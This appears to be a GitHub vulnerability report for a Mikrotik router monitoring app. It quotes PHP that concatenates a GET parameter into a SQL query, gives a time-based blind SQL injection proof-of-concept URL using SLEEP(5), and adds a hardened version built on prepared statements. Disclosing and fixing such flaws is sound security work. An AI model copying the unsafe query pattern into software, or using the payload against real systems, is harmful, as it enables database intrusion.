include('credentials.php');
$community = $_GET['community'];
$_SESSION['community'] = $community;
$query = "SELECT name from router where `community`='$community'";
$conn = new mysqli($db_host,$db_user,$db_pwd);
$conn->select_db('mikrotik');
The parameter $community is vulnerable to SQL injection.
PoC:
http://192.168.178.132/check_community.php?community=1' AND (SELECT 6941 FROM (SELECT(SLEEP(5)))Qaxg) AND 'sdHI'='sdHI
Jul10l1r4 added a commit to Jul10l1r4/Mikrotik-Router-Monitoring-System that referenced this issue May 17, 2020
Vulnerability type: SQL injection
Vulnerable code: in file check_community.php, line 49
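A hardened form of the reported lookup, as an added example that is not part of the original issue or the project's own code: the community string is passed as a bound parameter, so a value such as the one in the PoC is compared as a literal string and never parsed as SQL. The helper name `find_routers_by_community`, the 64-byte length limit, the error responses and the output loop are assumptions; `credentials.php`, its variables, and the table and column names come from the snippet in the report.

```php
<?php
declare(strict_types=1);

// Hypothetical helper (not in the project): returns the router names for one
// community string. The value travels as a bound parameter, not as SQL text.
function find_routers_by_community(mysqli $conn, string $community): array
{
    // Constructed sanity limit (assumption): reject empty or oversized input.
    // This is defence in depth; the bound parameter is the actual fix.
    if ($community === '' || strlen($community) > 64) {
        throw new InvalidArgumentException('invalid community string');
    }
    $stmt = $conn->prepare('SELECT name FROM router WHERE `community` = ?');
    $stmt->bind_param('s', $community);
    $stmt->execute();
    $stmt->bind_result($name);
    $names = [];
    while ($stmt->fetch()) {
        $names[] = $name;
    }
    $stmt->close();
    return $names;
}

session_start();
include 'credentials.php'; // defines $db_host, $db_user, $db_pwd (from the report)
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw on DB errors

$community = $_GET['community'] ?? '';
if (!is_string($community)) { // ?community[]=x arrives as an array
    http_response_code(400);
    exit('Bad request');
}
try {
    $conn = new mysqli($db_host, $db_user, $db_pwd, 'mikrotik');
    $names = find_routers_by_community($conn, $community);
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    exit('Bad request');
} catch (mysqli_sql_exception $e) {
    error_log($e->getMessage()); // keep database errors out of the response
    http_response_code(500);
    exit('Internal error');
}
$_SESSION['community'] = $community; // stored only after the lookup succeeded
foreach ($names as $n) {
    echo htmlspecialchars($n, ENT_QUOTES, 'UTF-8'), "\n";
}
```

With this version the request from the PoC returns without the five-second delay, which gives a quick regression check for the fix.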